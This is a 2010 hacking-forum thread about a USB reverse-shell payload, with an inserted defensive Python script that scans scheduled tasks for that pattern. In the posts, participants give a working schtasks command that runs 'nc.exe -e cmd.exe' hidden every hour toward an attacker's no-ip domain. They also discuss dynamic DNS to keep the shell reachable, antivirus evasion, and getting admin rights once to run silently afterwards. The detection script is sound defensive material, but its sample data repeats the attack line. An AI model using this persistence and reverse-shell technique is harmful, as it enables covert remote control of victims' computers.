X3N Posted April 12, 2010
Wow, looks great!! Any updates on virus undetection? Like making the tool FUD? And U3 too? I've written a few reverse shells in Python... it's not hard to do.
javabudd Posted July 1, 2010 (edited)
So today, I randomly started messing around with this payload and I thought about a few problems that one could have when using it.

First off, the way the reverse shell works is that the infected computer sends out a request to connect to the attacker's computer (spawning a cmd), which is done by putting your WAN IP address in the setup.inf file and others. The problem here is that most internet users do not have a static IP address, which means when your ISP changes your IP address, the reverse shell no longer works. A fix to this is a sweet program/website I found called no-ip DUC (www.no-ip.com). What this website does is allow you to create a free domain name, and using the program they offer, it auto-updates your WAN IP to the domain you registered at the website. In short, if you're running the no-ip program it will check your current WAN IP and update it to your domain name accordingly. So instead of typing in your IP address in the setup.inf files, you would type your domain (plcommando.no-ip.org) (remember to not include the www.).

The second flaw that I found is that when you are using this program, you have to wait for them to connect to you, which is a bitch. In some previous versions, I tried using the "at" command to schedule a reverse shell interactively every few hours, but on newer versions of Windows (Vista, 7) the "at" command cannot be run interactively (can't execute programs). A solution to this is to use the new "schtasks" command to schedule the tasks a hell of a lot easier. Instead of having 20 different jobs to schedule when you want them to connect to you, this new command makes them all possible in 1, and can be run interactively. The command is (schtasks /create /IT /SC HOURLY /TN "TASKNAME" /TR "C:\windows\system32\hidec.exe /w nc.exe -e cmd.exe "YOUR DOMAIN" "YOUR PORT") which sends a reverse shell every hour and can be switched to minutes, seconds, etc.
This way you only have 1 job hidden next to several that Microsoft has in there by default. That's all I got, my fingers hurt... <3 sable
Edited July 1, 2010 by javabudd
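The persistence pattern described in the post above (a hidden-window launcher wrapping netcat, pointed at a dynamic-DNS name, registered as an hourly scheduled task) leaves a very recognisable footprint in the task list. The script below is an added detection example, not code from the thread or from the payload it discusses: it parses output in the shape of `schtasks /query /fo CSV /v` (a constructed sample with a subset of the real columns) and flags tasks whose action carries those indicators. The indicator list and the column subset are assumptions made for this example.

```python
"""Flag scheduled tasks whose action looks like a reverse-shell beacon.

Heuristics mirror the persistence pattern from the thread: a hidden-window
launcher (hidec.exe) wrapping netcat (nc.exe -e cmd.exe) aimed at a dynamic
DNS name, registered on a frequent (hourly) schedule.
"""
import csv
import io
import re

# Constructed sample in the shape of `schtasks /query /fo CSV /v` output,
# reduced to a subset of its columns for this example (assumption: the
# column names match the real tool; the host, task and user names are made up).
SAMPLE_SCHTASKS_CSV = r'''"HostName","TaskName","Status","Author","Task To Run","Run As User","Schedule Type","Repeat: Every"
"WS01","\Microsoft\Windows\Defrag\ScheduledDefrag","Ready","Microsoft Corporation","%windir%\system32\defrag.exe -c","SYSTEM","Weekly","N/A"
"WS01","\TASKNAME","Ready","WS01\user","C:\windows\system32\hidec.exe /w nc.exe -e cmd.exe plcommando.no-ip.org 4444","WS01\user","Hourly","1 Hour"
"WS01","\GoogleUpdateTaskMachineUA","Ready","WS01\user","C:\Program Files\Google\Update\GoogleUpdate.exe /ua /installsource scheduler","SYSTEM","Daily","1 Hour"
'''

# Illustrative indicator set; a real deployment would extend it from telemetry.
COMMAND_INDICATORS = [
    ("netcat reverse shell", re.compile(r"\bnc(?:at)?\.exe\b.*\s-e\s+cmd\.exe", re.I)),
    ("hidden-window launcher", re.compile(r"\bhidec\.exe\b", re.I)),
    ("dynamic DNS host", re.compile(r"\b[\w-]+\.(?:no-ip\.(?:org|com|biz|info)|ddns\.net)\b", re.I)),
    ("cmd.exe given a host and port", re.compile(r"cmd\.exe\s+\S+\s+\d{2,5}\b", re.I)),
]

# Schedule types that fit a beaconing task; only weighted once a command
# indicator has already matched, since many benign tasks run hourly.
FREQUENT_SCHEDULES = {"Hourly", "Minute"}


def scan_schtasks_csv(text):
    """Return a list of findings, one per task whose action matched an indicator."""
    findings = []
    for row in csv.DictReader(io.StringIO(text)):
        command = row.get("Task To Run", "")
        reasons = [name for name, pattern in COMMAND_INDICATORS if pattern.search(command)]
        if not reasons:
            continue  # a frequent schedule on its own is not suspicious
        if row.get("Schedule Type") in FREQUENT_SCHEDULES:
            reasons.append("frequent schedule")
        findings.append({
            "task": row.get("TaskName", ""),
            "run_as": row.get("Run As User", ""),
            "command": command,
            "reasons": reasons,
        })
    return findings


if __name__ == "__main__":
    for finding in scan_schtasks_csv(SAMPLE_SCHTASKS_CSV):
        print(f"{finding['task']} ({finding['run_as']}): {', '.join(finding['reasons'])}")
        print(f"    {finding['command']}")
```

On a live host, feed it the decoded output of `schtasks /query /fo CSV /v` (the tool may emit a byte-order mark or non-UTF-8 text depending on the console code page, so decode before parsing). The two benign tasks in the sample are deliberately included so the scan only reports the one whose action carries the netcat, hidden-window and dynamic-DNS indicators together with its hourly schedule.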
javabudd Posted July 1, 2010 (edited)
@jen/thedadymac The program is created so that they connect to you, regardless of a router. The reason the router doesn't matter is because we are using a reverse shell method, which has the victim send a connection request to the attacker (who has his ports forwarded on his router). If you need some help, PM or somethin.
Edited July 1, 2010 by javabudd
sablefoxx (Author) Posted July 2, 2010 (edited)
@javabudd, hey, hit me up on Skype sometime; you should help me and Pat w/ the new version of APE. I also have a basic working version of that System TaKeover which emails updates w/ IP addresses and stuff. Also we have an empty seat in our car to Defcon if you wanna tag along.
Edited July 2, 2010 by sablefoxx
EMB Posted July 7, 2010
Hey guys, just joined. Wouldn't you need admin for this? And it isn't autonomous on Win7 coz Win7 is a bitch and won't listen to an autorun.inf file D:
sablefoxx (Author) Posted July 7, 2010
Quoting EMB: "Hey guys, just joined. Wouldn't you need admin for this? And it isn't autonomous on Win7 coz Win7 is a bitch and won't listen to an autorun.inf file D:"
Yes, but all you have to do is run as admin once (can auto-prompt too) and you should be able to have it run as admin every time after that without prompting the user. So basically there are two button clicks instead of none :( but not terrible.
javabudd Posted April 9, 2011
I think it's time for an update... Got some good ideas we can use!